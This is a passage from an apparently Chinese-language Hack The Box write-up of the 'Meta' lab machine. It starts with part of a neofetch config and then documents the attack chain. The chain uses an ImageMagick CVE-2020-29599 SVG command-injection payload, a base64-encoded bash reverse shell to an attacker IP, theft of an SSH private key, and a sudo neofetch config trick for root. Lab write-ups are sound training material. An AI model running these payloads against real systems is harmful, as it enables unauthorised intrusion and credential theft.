# Values:  '/', '/dev/sdXX', '/path/to/drive'.
# Flag:    --disk_show
#
# Example:
# disk_show=('/' '/dev/sdb1'):
#      'Disk (/): 74G / 118G (66%)'
#      'Disk (/mnt/Videos): 823G / 893G (93%)'
#
# disk_show=('/'):
#      'Disk (/): 74G / 118G (66%)'
#
disk_show=('/')

# Disk subtitle.
# What to append to the Disk subtitle.
#
# Default: 'mount'
# Values:  'mount', 'name', 'dir'
# Flag:    --disk_subtitle
#
# Example:
# name:   'Disk (/dev/sda1): 74G / 118G (66%)'
#         'Disk (/dev/sdb2): 74G / 118G (66%)'
#
# mount:  'Disk (/): 74G / 118G (66%)'
#         'Disk (/mnt/Local Disk): 74G / 118G (66%)'
#         'Disk (/mnt/Videos): 74G / 118G (66%)'
#
# dir:    'Disk (/): 74G / 118G (66%)'
#         'Disk (Local Disk): 74G / 118G (66%)'
#         'Disk (Videos): 74G / 118G (66%)'
disk_subtitle="mount"


# Song


# Manually specify a music player.
#
# Default: 'auto'
# Values:  'auto', 'player-name'
# Flag:    --music_player
#
# Available values for 'player-name':
#
# amarok
# audacious
# banshee
# bluemindo
# clementine
# cmus
# deadbeef
# deepin-music
# dragon
# elisa
# exaile
# gnome-music
# gmusicbrowser
# guayadeque
# iTunes
# juk
# lollypop
# mocp
# mopidy
# mpd
# netease-cloud-music
# pogo
# pragha
# qmmp
# quodlibet
# rhythmbox
# sayonara
# smplayer
# spotify
# tomahawk
# vlc
# xmms2d
# yarock
music_player="auto"

# Format to display song information.
#
# Default: '%artist% - %album% - %title%'
# Values:  '%artist%', '%album%', '%title%'
# Flag:    --song_format
#
# Example:
# default: 'Song: Jet - Get Born - Sgt Major'
song_format="%artist% - %album% - %title%"

# Print the Artist, Album and Title on separate lines
#
# Default: 'off'
# Values:  'on', 'off'
# Flag:    --song_shorthand
#
# Example:
# on:  'Artist: The Fratellis'
#      'Album: Costello Music'
#      'Song: Chelsea Dagger'
#
# off: 'Song: The Fratellis - Costello Music - Chelsea Dagger'
song_shorthand="off"

# 'mpc' arguments (specify a host, password etc).
#
# Default:  ''
# Example: mpc_args=(-h HOST -P PASSWORD)
mpc_args=()


# Text Colors


# Text Colors
#
# Default:  'distro'
# Values:   'distro', 'num' 'num' 'num' 'num' 'num' 'num'
# Flag:     --colors
#
# Each number represents a different part of the text in
# this order: 'title', '@', 'underline', 'subtitle', 'colon', 'info'
#
# Example:
# colors=(distro)      - Text is colored based on Distro colors.
# colors=(4 6 1 8 8 6) - Text is colored in the order above.
colors=(distro)


# Text Options


# Toggle bold text
#
# Default:  'on'
# Values:   'on', 'off'
# Flag:     --bold
bold="on"

# Enable/Disable Underline
#
# Default:  'on'
# Values:   'on', 'off'
# Flag:     --underline
underline_enabled="on"

# Underline character
#
# Default:  '-'
# Values:   'string'
# Flag:     --underline_char
underline_char="-"


# Info Separator
# Replace the default separator with the specified string.
#
# Default:  ':'
# Flag:     --separator
#
# Example:
# separator="->":   'Shell-> bash'
# separator=" =":   'WM = dwm'
separator=":"


# Color Blocks


# Color block range
# The range of colors to print.
#
# Default:  '0', '7'
# Values:   'num'
# Flag:     --block_range
#
# Example:
#
# Display colors 0-7 in the blocks.  (8 colors)
# neofetch --block_range 0 7
#
# Display colors 0-15 in the blocks. (16 colors)
# neofetch --block_range 0 15
block_range=(0 7)

# Toggle color blocks
#
# Default:  'on'
# Values:   'on', 'off'
# Flag:     --color_blocks
color_blocks="on"

# Color block width in spaces
#
# Default:  '3'
# Values:   'num'
# Flag:     --block_width
block_width=3

# Color block height in lines
#
# Default:  '1'
# Values:   'num'
# Flag:     --block_height
block_height=1


# Progress Bars


# Bar characters
#
# Default:  '-', '='
# Values:   'string', 'string'
# Flag:     --bar_char
#
# Example:
# neofetch --bar_char 'elapsed' 'total'
# neofetch --bar_char '-' '='
bar_char_elapsed="-"
bar_char_total="="

# Toggle Bar border
#
# Default:  'on'
# Values:   'on', 'off'
# Flag:     --bar_border
bar_border="on"

# Progress bar length in spaces
# Number of chars long to make the progress bars.
#
# Default:  '15'
# Values:   'num'
# Flag:     --bar_length
bar_length=15

# Progress bar colors
# When set to distro, uses your distro's logo colors.
#
# Default:  'distro', 'distro'
# Values:   'distro', 'num'
# Flag:     --bar_colors
#
# Example:
# neofetch --bar_colors 3 4
# neofetch --bar_colors distro 5
bar_color_elapsed="distro"
bar_color_total="distro"


# Info display
# Display a bar with the info.
#
# Default: 'off'
# Values:  'bar', 'infobar', 'barinfo', 'off'
# Flags:   --cpu_display
#          --memory_display
#          --battery_display
#          --disk_display
#
# Example:
# bar:     '[---=======]'
# infobar: 'info [---=======]'
# barinfo: '[---=======] info'
# off:     'info'
cpu_display="off"
memory_display="off"
battery_display="off"
disk_display="off"


# Backend Settings


# Image backend.
#
# Default:  'ascii'
# Values:   'ascii', 'caca', 'chafa', 'jp2a', 'iterm2', 'off',
#           'termpix', 'pixterm', 'tycat', 'w3m', 'kitty'
# Flag:     --backend
image_backend="ascii"

# Image Source
#
# Which image or ascii file to display.
#
# Default:  'auto'
# Values:   'auto', 'ascii', 'wallpaper', '/path/to/img', '/path/to/ascii', '/path/to/dir/'
#           'command output (neofetch --ascii "$(fortune | cowsay -W 30)")'
# Flag:     --source
#
# NOTE: 'auto' will pick the best image source for whatever image backend is used.
#       In ascii mode, distro ascii art will be used and in an image mode, your
#       wallpaper will be used.
image_source="auto"


# Ascii Options


# Ascii distro
# Which distro's ascii art to display.
#
# Default: 'auto'
# Values:  'auto', 'distro_name'
# Flag:    --ascii_distro
#
# NOTE: Arch and Ubuntu have 'old' logo variants.
#       Change this to 'arch_old' or 'ubuntu_old' to use the old logos.
# NOTE: Ubuntu has flavor variants.
#       Change this to 'Lubuntu', 'Xubuntu', 'Ubuntu-GNOME' or 'Ubuntu-Budgie' to use the flavors.
# NOTE: Arch, Crux and Gentoo have a smaller logo variant.
#       Change this to 'arch_small', 'crux_small' or 'gentoo_small' to use the small logos.
ascii_distro="auto"

# Ascii Colors
#
# Default:  'distro'
# Values:   'distro', 'num' 'num' 'num' 'num' 'num' 'num'
# Flag:     --ascii_colors
#
# Example:
# ascii_colors=(distro)      - Ascii is colored based on Distro colors.
# ascii_colors=(4 6 1 8 8 6) - Ascii is colored using these colors.
ascii_colors=(distro)

# Bold ascii logo
# Whether or not to bold the ascii logo.
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --ascii_bold
ascii_bold="on"


# Image Options


# Image loop
# Setting this to on will make neofetch redraw the image constantly until
# Ctrl+C is pressed. This fixes display issues in some terminal emulators.
#
# Default:  'off'
# Values:   'on', 'off'
# Flag:     --loop
image_loop="off"

# Thumbnail directory
#
# Default: '~/.cache/thumbnails/neofetch'
# Values:  'dir'
thumbnail_dir="${XDG_CACHE_HOME:-${HOME}/.cache}/thumbnails/neofetch"

# Crop mode
#
# Default:  'normal'
# Values:   'normal', 'fit', 'fill'
# Flag:     --crop_mode
#
# See this wiki page to learn about the fit and fill options.
# https://github.com/dylanaraps/neofetch/wiki/What-is-Waifu-Crop%3F
crop_mode="normal"

# Crop offset
# Note: Only affects 'normal' crop mode.
#
# Default:  'center'
# Values:   'northwest', 'north', 'northeast', 'west', 'center'
#           'east', 'southwest', 'south', 'southeast'
# Flag:     --crop_offset
crop_offset="center"

# Image size
# The image is half the terminal width by default.
#
# Default: 'auto'
# Values:  'auto', '00px', '00%', 'none'
# Flags:   --image_size
#          --size
image_size="auto"

# Gap between image and text
#
# Default: '3'
# Values:  'num', '-num'
# Flag:    --gap
gap=3

# Image offsets
# Only works with the w3m backend.
#
# Default: '0'
# Values:  'px'
# Flags:   --xoffset
#          --yoffset
yoffset=0
xoffset=0

# Image background color
# Only works with the w3m backend.
#
# Default: ''
# Values:  'color', 'blue'
# Flag:    --bg_color
background_color=


# Misc Options

# Stdout mode
# Turn off all colors and disables image backend (ASCII/Image).
# Useful for piping into another command.
# Default: 'off'
# Values: 'on', 'off'
stdout="off"
www-data@meta:/tmp$ 

www-data@meta:/tmp$ cat /usr/local/bin/convert_images.sh
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
www-data@meta:/tmp$ 

22、在脚本里发现了个命令，和涉及一个程序，我们继续查看下这个程序

www-data@meta:/tmp$ ls -la /usr/local/bin/mogrify
lrwxrwxrwx 1 root root 6 Aug 29  2021 /usr/local/bin/mogrify -> magick
www-data@meta:/tmp$ /usr/local/bin/mogrify -version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib
www-data@meta:/tmp$ 

23、这里发现了这个软件和版本，那就搜下漏洞吧

ImageMagick 7.0.10-36 漏洞

CVE-2020-29599

https://blog.csdn.net/zzzzz1284/article/details/129496149

https://github.com/vulhub/vulhub/blob/master/imagemagick/CVE-2020-29599/poc.svg

24、那就按照上述提示，漏洞利用吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.140 - - [30/Jan/2024 14:35:16] "GET /poc.svg HTTP/1.1" 200 -

www-data@meta:/tmp$ wget http://10.10.14.4/poc.svg
--2024-01-30 01:35:15--  http://10.10.14.4/poc.svg
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 398 [image/svg+xml]
Saving to: 'poc.svg'

poc.svg             100%[===================>]     398  --.-KB/s    in 0.004s  

2024-01-30 01:35:16 (87.4 KB/s) - 'poc.svg' saved [398/398]

www-data@meta:/tmp$ ls
poc.svg  pspy64
www-data@meta:/tmp$ 

www-data@meta:/tmp$ ls
poc.svg  pspy64
www-data@meta:/tmp$ identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.004
www-data@meta:/tmp$ convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
www-data@meta:/tmp$ 

www-data@meta:/tmp$ ls
0wned  poc.svg  pspy64
www-data@meta:/tmp$ cat 0wned 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@meta:/tmp$ 

25、这里查看这个 poc.svg 的文件

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat poc.svg 
<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>  

26、感觉是方法用的，这里需要结合上面的漏洞的那个进程进行操作的，这里修改下poc吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'bash  -i >& /dev/tcp/10.10.14.4/10086 0>&1 ' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=

# 把poc.svg修改为下面的内容

<image authenticate='ff" `echo "YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=" | base64 -d | bash`;"'>

27、开始修改漏洞利用脚本

www-data@meta:/tmp$ 
www-data@meta:/tmp$ vim poc.svg 
www-data@meta:/tmp$ cat poc.svg 
<image authenticate='ff" `echo "YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=" | base64 -d | bash`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>
www-data@meta:/tmp$ 

28、开始尝试利用

www-data@meta:/tmp$ cp /tmp/poc.svg /var/www/dev01.artcorp.htb/convert_images/
www-data@meta:/tmp$ ls -la /var/www/dev01.artcorp.htb/convert_images/
total 8
drwxrwxr-x 2 root www-data 4096 Jan  4  2022 .
drwxr-xr-x 4 root root     4096 Oct 18  2021 ..
</poc.svg /var/www/dev01.artcorp.htb/convert_images/
www-data@meta:/tmp$ ls -la /var/www/dev01.artcorp.htb/convert_images/
total 12
drwxrwxr-x 2 root     www-data 4096 Jan 30 01:49 .
drwxr-xr-x 4 root     root     4096 Oct 18  2021 ..
-rw-r--r-- 1 www-data www-data  466 Jan 30 01:49 poc.svg
www-data@meta:/tmp$ 

29、成功获取到目标用户权限

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 50490
bash: cannot set terminal process group (4687): Inappropriate ioctl for device
bash: no job control in this shell
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ id
id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ cd ~
cd ~
thomas@meta:~$ 

30、获取下flag信息吧

thomas@meta:~$ ls
ls
user.txt
thomas@meta:~$ cat user.txt
cat user.txt
af6d509b3bb924e92d8d08724746d4ff
thomas@meta:~$ 

0x02 系统权限获取

31、下面开始进行提权的枚举，在提权之前，先下载下ssh的秘钥，我们通过秘钥进行登录，这样枚举起来更加稳妥

thomas@meta:~$ ls -la
ls -la
total 32
drwxr-xr-x 4 thomas thomas 4096 Jan 17  2022 .
drwxr-xr-x 3 root   root   4096 Aug 29  2021 ..
lrwxrwxrwx 1 root   root      9 Aug 29  2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas  220 Aug 29  2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29  2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30  2021 .config
-rw-r--r-- 1 thomas thomas  807 Aug 29  2021 .profile
drwx------ 2 thomas thomas 4096 Jan  4  2022 .ssh
-rw-r----- 1 root   thomas   33 Jan 29 21:54 user.txt
thomas@meta:~$ cd .ssh
cd .ssh
thomas@meta:~/.ssh$ ls -la
ls -la
total 20
drwx------ 2 thomas thomas 4096 Jan  4  2022 .
drwxr-xr-x 4 thomas thomas 4096 Jan 17  2022 ..
-rw-r--r-- 1 thomas thomas  563 Jan  4  2022 authorized_keys
-rw------- 1 thomas thomas 2590 Aug 29  2021 id_rsa
-rw-r--r-- 1 thomas thomas  563 Aug 29  2021 id_rsa.pub
thomas@meta:~/.ssh$ 

thomas@meta:~/.ssh$ python3 -m http.server 8080
python3 -m http.server 8080

┌──(kali㉿offsec)-[~/Desktop]
└─$ wget http://10.10.11.140:8080/id_rsa
--2024-01-30 14:54:11--  http://10.10.11.140:8080/id_rsa
正在连接 10.10.11.140:8080... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：2590 (2.5K) [application/octet-stream]
正在保存至: “id_rsa”

id_rsa                   100%[===============================>]   2.53K  --.-KB/s  用时 0s      

2024-01-30 14:54:12 (167 MB/s) - 已保存 “id_rsa” [2590/2590])

┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -i id_rsa thomas@10.10.11.140
The authenticity of host '10.10.11.140 (10.10.11.140)' can't be established.
ED25519 key fingerprint is SHA256:Y8C2lOecv5ZDp3I6M5zjDUYDVsc3p/pgjF9HVRPioqQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.140' (ED25519) to the list of known hosts.
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
thomas@meta:~$ 

32、开始尝试枚举下sudo权限信息

thomas@meta:~$ id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:~$ sudo -l
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"
thomas@meta:~$ 

33、运行这个程序，发现提权需要通过这个程序

thomas@meta:~$ 
thomas@meta:~$ /usr/bin/neofetch
       _,met$$$$$gg.          thomas@meta 
    ,g$$$$$$$$$$$$$$$P.       ----------- 
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64 
 ,$$P'              `$$$.     Host: VMware Virtual Platform None 
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64 
`d$$'     ,$P"'   .    $$$    Uptime: 4 hours, 2 mins 
 $$P      d$'     ,    $$P    Packages: 495 (dpkg) 
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3 
 $$;      Y$b._   _,d$P'      Terminal: /dev/pts/2 
 Y$$.    `.`"Y$$$$P"'         CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz 
 `$$b      "-.__              GPU: VMware SVGA II Adapter 
  `Y$$                        Memory: 146MiB / 1994MiB                                           
   `Y$$.
     `$$b.                                            
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$ sudo /usr/bin/neofetch
       _,met$$$$$gg.          root@meta 
    ,g$$$$$$$$$$$$$$$P.       --------- 
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64 
 ,$$P'              `$$$.     Host: VMware Virtual Platform None 
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64 
`d$$'     ,$P"'   .    $$$    Uptime: 4 hours, 3 mins 
 $$P      d$'     ,    $$P    Packages: 495 (dpkg) 
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3 
 $$;      Y$b._   _,d$P'      CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz 
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter 
 `$$b      "-.__              Memory: 146MiB / 1994MiB 
  `Y$$                                                                                           
   `Y$$.                                              
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$ 

34、这里有个信息，需要提示下：后面的 "" 是用来防止输出其他参数的，也就是默认只能运行程序

(root) NOPASSWD: /usr/bin/neofetch \"\"

35、这里如果想提权，就涉及到一个新的知识点了

env_keep+=XDG_CONFIG_HOME

运行 Sudo 命令时，它会将环境变量 XDG_CONFIG_HOME 保留给 Sudo 命令！

环境变量 XDG_CONFIG_HOME 是什么？

有一个相对于该基目录的特定于用户的配置文件应写入该目录。此目录由环境变量 $XDG_CONFIG_HOME 定义。（摘自 https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html）

thomas@meta:~$ ls -la
total 36
drwxr-xr-x 5 thomas thomas 4096 Jan 30 01:54 .
drwxr-xr-x 3 root   root   4096 Aug 29  2021 ..
lrwxrwxrwx 1 root   root      9 Aug 29  2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas  220 Aug 29  2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29  2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30  2021 .config
drwx------ 3 thomas thomas 4096 Jan 30 01:54 .gnupg
-rw-r--r-- 1 thomas thomas  807 Aug 29  2021 .profile
drwx------ 2 thomas thomas 4096 Jan  4  2022 .ssh
-rw-r----- 1 root   thomas   33 Jan 29 21:54 user.txt
thomas@meta:~$ cd .config/
thomas@meta:~/.config$ ls -la
total 12
drwxr-xr-x 3 thomas thomas 4096 Aug 30  2021 .
drwxr-xr-x 5 thomas thomas 4096 Jan 30 01:54 ..
drwxr-xr-x 2 thomas thomas 4096 Dec 20  2021 neofetch
thomas@meta:~/.config$ cd neofetch/
thomas@meta:~/.config/neofetch$ ls -la
total 24
drwxr-xr-x 2 thomas thomas  4096 Dec 20  2021 .
drwxr-xr-x 3 thomas thomas  4096 Aug 30  2021 ..
-rw-r--r-- 1 thomas thomas 14591 Aug 30  2021 config.conf
thomas@meta:~/.config/neofetch$

36、利用提示文件

https://gtfobins.github.io/gtfobins/neofetch/#sudo

TF=$(mktemp)
echo 'exec /bin/sh' >$TF
sudo neofetch --config $TF

37、导出 XDG_CONFIG_HOME 环境变量，并通过我们邪恶的 neofecth 的配置文件以 root 身份执行任何命令

thomas@meta:~$ cd ~
thomas@meta:~$ export XDG_CONFIG_HOME="$HOME/.config"
thomas@meta:~$ echo 'exec /bin/bash' > .config/neofetch/config.conf
thomas@meta:~$ sudo /usr/bin/neofetch
root@meta:/home/thomas# 
root@meta:/home/thomas# cd /root/
root@meta:~# ls
conf  root.txt
root@meta:~# cat root.txt 
d8601891ec6cf00e8a786db52d42cec2
root@meta:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/429